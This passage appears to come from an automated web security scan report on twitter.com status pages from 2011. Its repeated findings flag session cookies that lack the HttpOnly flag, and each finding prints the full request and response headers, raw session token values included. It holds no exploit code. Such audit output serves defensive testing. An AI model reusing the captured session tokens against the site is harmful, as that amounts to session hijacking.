Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:26:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224768-45229-19192
ETag: "61be2a00c7b94607e218eb5ebb7189c0"
Last-Modified: Fri, 28 Jan 2011 14:26:08 GMT
X-Runtime: 0.04251
Content-Type: text/html; charset=utf-8
Content-Length: 13824
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0MzYxMzU3MzkyNjkxMzoMY3NyZl9pZCIlMDhhNzE0NWUzZGQy%250AYThjMGFmMzNlOGU2N2YzMWMyNmI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--d7b87ffd3961937960551fd20ef085add3dc652a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.130. http://twitter.com/malsup/status/29343882311372800

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/29343882311372800

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/29343882311372800 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224752-86611-17718
ETag: "8e8ba1c134c1602542f62fdaa8e9f7dd"
Last-Modified: Fri, 28 Jan 2011 14:25:52 GMT
X-Runtime: 0.05141
Content-Type: text/html; charset=utf-8
Content-Length: 13680
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTM0Mzg4MjMxMTM3MjgwMDoMY3NyZl9pZCIlOTMwZjZkOTU4Nzcz%250AZmZlODFmOTdmMGIwMjJjZmMwZTk6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--4ec685a9450e1b8fefd04b4578645a1edde9bad3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.131. http://twitter.com/malsup/status/29510556067041280

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/29510556067041280

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/29510556067041280 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224752-42900-60801
ETag: "d61b7e8839b68f0e6bbfeea3f24f11e7"
Last-Modified: Fri, 28 Jan 2011 14:25:52 GMT
X-Runtime: 0.06556
Content-Type: text/html; charset=utf-8
Content-Length: 13632
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTUxMDU1NjA2NzA0MTI4MDoMY3NyZl9pZCIlYjkxNjUxMjBkZmM0%250AYTJhMGUyNjZiZDRjZWFhMTg5YzQ6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--879a5af66cf85b03132a55e267e75f8e107db447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.132. http://twitter.com/malsup/status/29705355999055872

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/29705355999055872

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/29705355999055872 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224751-25049-63292
ETag: "f4d24b4b0ce19c88101731df05975e44"
Last-Modified: Fri, 28 Jan 2011 14:25:51 GMT
X-Runtime: 0.26212
Content-Type: text/html; charset=utf-8
Content-Length: 13555
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yOTcwNTM1NTk5OTA1NTg3MjoMY3NyZl9pZCIlNDAwZjBkMzA5YTgy%250AYzk1NGFhZGY3Y2YxMWZhNTEzNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--c0d59aed3199a40c6a1fc20a84673263ba8b0524; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.133. http://twitter.com/malsup/status/30065585396121601

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/30065585396121601

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30065585396121601 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224746-71315-7024
ETag: "53739e8689a75eb0e462fb3f46dbe87a"
Last-Modified: Fri, 28 Jan 2011 14:25:46 GMT
X-Runtime: 0.06652
Content-Type: text/html; charset=utf-8
Content-Length: 13645
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDA2NTU4NTM5NjEyMTYwMToMY3NyZl9pZCIlNWViNDc0NjJhYjUy%250AYmJiMjUwZjk0ZjZiY2Q5NWQ2MjM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--a5345f31cffd9fbf70b4a6bddd83fd98f48576ba; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.134. http://twitter.com/malsup/status/30103594925555712

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/30103594925555712

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30103594925555712 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224744-39713-23366
ETag: "7bb96996c6739d3b30a2757944a67cce"
Last-Modified: Fri, 28 Jan 2011 14:25:44 GMT
X-Runtime: 0.05847
Content-Type: text/html; charset=utf-8
Content-Length: 13787
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDEwMzU5NDkyNTU1NTcxMjoMY3NyZl9pZCIlZGQ5ZmU5ZmYzMGNm%250AMjhiMDY0MzgzM2U2NGNjMzJlMDY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--176b58f6205e5a5aa6ed8ffb4443a86e18553832; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.135. http://twitter.com/malsup/status/30232367046074369

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/30232367046074369

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30232367046074369 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224742-9041-16904
ETag: "d3e65130366342526ec8ade660cf3dbb"
Last-Modified: Fri, 28 Jan 2011 14:25:42 GMT
X-Runtime: 0.04768
Content-Type: text/html; charset=utf-8
Content-Length: 13683
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDIzMjM2NzA0NjA3NDM2OToMY3NyZl9pZCIlYTM3MGRmOTZhODQz%250AM2RiNDBlMmY1M2I5OTM2NjFmYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e05cd9620525d156ee51f67a18a4e6ea60c33e75; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.136. http://twitter.com/malsup/status/30417132269346816

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/30417132269346816

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30417132269346816 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224742-7004-30272
ETag: "da9e6ffc8f0c311694071739765bd753"
Last-Modified: Fri, 28 Jan 2011 14:25:42 GMT
X-Runtime: 0.04299
Content-Type: text/html; charset=utf-8
Content-Length: 13699
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxNzEzMjI2OTM0NjgxNjoMY3NyZl9pZCIlYzFhNDVhNDY0ZjBj%250ANTkyYTUyYTU1YjI1ZjJjN2VmZDg6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--1619ced3ca9bc9fa08b4a84d7d647b1b47a62ad4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.137. http://twitter.com/malsup/status/30418291201679360

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/30418291201679360

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30418291201679360 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-43275-1259
ETag: "b36130e1f840ffcb8130031180af8a87"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.07149
Content-Type: text/html; charset=utf-8
Content-Length: 13636
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQxODI5MTIwMTY3OTM2MDoMY3NyZl9pZCIlNjZjMzQ2MThjNmJl%250ANjFjN2ZmMzBjNjgyMTNiYzQ1N2Q6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--be54aaa7f049891a1ab52a41024afae2053a60f4; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.138. http://twitter.com/malsup/status/30442842241376256

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/30442842241376256

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30442842241376256 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-54021-29414
ETag: "c768dc702745a41fcbc487b93ba7b1d0"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.05060
Content-Type: text/html; charset=utf-8
Content-Length: 13590
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoMY3NyZl9pZCIlMTdjZmE5ZGJlZjVk%250AM2JkM2I0YWIyZDA1MzE3NTdhYjE6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--eff563544b6e766e02e277b4b06265fffbf2e5f3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.139. http://twitter.com/malsup/status/30772839023910912

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /malsup/status/30772839023910912

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/30772839023910912 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-93635-34868
ETag: "78f139df4c6b6f726d8cd49448048d35"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.08978
Content-Type: text/html; charset=utf-8
Content-Length: 13741
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
